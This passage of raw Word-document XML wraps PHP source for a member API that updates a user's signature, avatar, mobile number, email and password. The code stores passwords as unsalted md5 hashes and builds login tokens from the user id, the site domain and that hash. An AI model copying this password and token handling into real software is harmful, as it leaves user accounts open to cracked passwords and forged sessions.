        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB109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BE2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2931D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'qianming' =&gt; $qianming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E83B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8349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542A60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8CBE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41465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41CC4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A208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2FEE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDFA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$this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072852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30E29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'qianming' =&gt; $qianming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F561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BB5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0EE02C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91518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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4947BA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D83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4A170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05CF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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885B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D60DE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385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F51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AF2B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1A5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/api/member/avatar </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC265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修改会员头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B79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076BD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EE36C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05C090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image    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像（七牛图片文件名，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eg. 042e820210812091212723761.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476387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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A1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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FC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654C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avatar()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F9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30E2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86F2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C71E5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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6874DD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6670F6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BCC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33C9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input('param.image', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF8D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70664F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1CA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FB3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56146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=&gt; $image,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A325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D602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451FF4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5E5BB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$validate-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962A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289C4B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07B8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37F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C092F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$this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C50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-&gt;update([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015BB5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=&gt; $image,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B2F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43B9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3826FC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AB0D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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17DB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5AAB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57F29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A54D3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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DAC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0097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CFC5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D60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D28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touxiang()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D5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B01A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(request()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF69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1AA1C6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4B3896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(!$filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F75C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0973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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333883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A2A6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0B04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B9C5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36EBCE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 = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58FD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(!in_array($ext, $geshi)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6C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E2DA2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07D0A6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AA2C4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4DAA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8A1F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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF252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17535D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74251F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4F3F6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4DACD9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7B3070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0C58A2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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D59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7B309B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12DCBB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392477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($err !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFE8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27838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$err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3919F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=&gt; 202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345982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EEED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1088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$this-&gt;memberId)-&gt;update(['img' =&gt; $ret['key']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DC2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$domain . '/' . $ret['key'], 'code' =&gt; 0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29907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B36A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1AC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22C33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24B4A6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$file-&gt;validate(['size' =&gt; 105678, 'ext' =&gt; 'jpg,png,gif,jpeg'])-&gt;move(ROOT_PATH . 'public' . DS . 'uploads' . DS . 'touimg');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175DB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($info) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FDB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'/public/uploads/touimg/' . $info-&gt;getSaveName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D70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str_replace('\\', '/', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAECD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$where['img'] = $img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C167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$this-&gt;memberId)-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F77A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21CD1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$img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26921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413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A9B3E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0BAA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$file-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63197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263B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7C83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3CB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9AD8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769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/api/member/mobile </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5F4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修改会员手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA857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1E2532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1420EA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4DD0EF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mobile   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机号码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638FC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code     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码（必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> text: </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68E2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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D0CF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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDC7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9A29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mobile()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939C4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296D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861C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B3C15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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B62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7EC8F5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8F80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363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 input('param.mobile', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AFCE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799FA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91BA2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请填写绑定手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64384B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5EAD8C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F05D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4F44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(!_isMobile($mobile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E123D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BC5F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手机号码格式错误，请填写正确手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C4A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3E480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1DC0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730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($this-&gt;member['mobile'] &amp;&amp; $this-&gt;member['mobile'] == $mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675755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C862D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您已经绑定了该手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6294C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7FA1A5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592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4C4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 input('param.code', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7968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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBBF4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8A03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请填写手机验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529EA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542438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9143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E8E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_codechecking($code, $mobile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70162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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0A7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BA6F1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$data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A55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562CA2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536E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D440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DB::name('member')-&gt;where('mobile', $mobile)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B217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504E3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4E57E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该手机号码已被其他用户绑定，请重新换手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533ECF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304,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA939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00A1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4D97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($this-&gt;member['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC3C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8720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您已经绑定过该手机号码，如需要解绑请联系客服</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091C1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16AA1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8F11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96E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477443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$this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B15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-&gt;setField('mobile', $mobile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FAB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2DE39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_records($this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102999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修改手机号码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FEA0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15948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294D8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修改手机号码失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D387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A5243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052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0E18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7ACEFD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EAB1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email()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DF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A69B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input('param.username') ? input('param.username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3E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(!$username) return ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请填写绑定手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129343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(!_isEmail($username)) return ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱格式错误，请填写正确邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3688BE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 input('param.code') ? input('param.code') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0E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return ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请填写邮箱验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525298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_codechecking($code, $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3A5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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB9DA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E0F1C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$data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B77D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0E5C2A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DF67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813C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DB::name('member')-&gt;where('email', $username)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0977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7845E6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AF4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邮箱已被其他用户绑定，请重新换邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01D4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305,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D1A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028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4BB8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($this-&gt;member['email']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E66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6D93F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您已经绑定过邮箱，如需要解绑请联系客服</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77715E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534477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97F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6188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Db::name('member')-&gt;where('id', $this-&gt;memberId)-&gt;setField('email', $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B558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D157C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_records($this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65FC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0FA1AA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绑定邮箱成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809A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B8A6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7C772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097BC0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绑定邮箱失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B917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7E06E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EAEA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3B9A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BA955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3B7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0804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/api/member/password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FE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修改会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38175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730EA2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@apiVersion 0.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136CA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49EF5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old_password   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户原密码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA73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new_password   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户新密码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359B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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E5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token  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFD82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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217581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FBC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password()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC6FD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EC53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463B55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D5A03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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DC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2A678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C6BB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0A80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$old_password = input('param.old_password', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEEC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$new_password = input('param.new_password', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE6A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(!$old_password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F6B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E4171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原密码不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBAB5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8E05D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6AB6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F437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(md5($old_password) != $this-&gt;member['password']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB9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7AD4A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原密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E113B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204,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762517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FC22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BD57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(!$new_password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D51C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AC0EC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新密码不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16501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897FA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6BC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6CCD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(md5($old_password) == md5($new_password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27126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76760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原密码和新密码不允许相同</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F19C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205,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07187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10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616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(md5($new_password) == $this-&gt;member['password']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4942FB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9B627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原密码和新密码不允许相同</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D8B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205,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB52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4CB8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3DC8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A511B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$this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748FA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-&gt;setField('password', md5($new_password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735E4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$token = _encrypt($this-&gt;memberId . '|www.ffxiang.cn|' . md5($new_password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79959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BE6AF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_records($this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF38F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29C609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修改密码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BD6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=&gt; $token,</w:t>
      </w:r>
    </w:p>
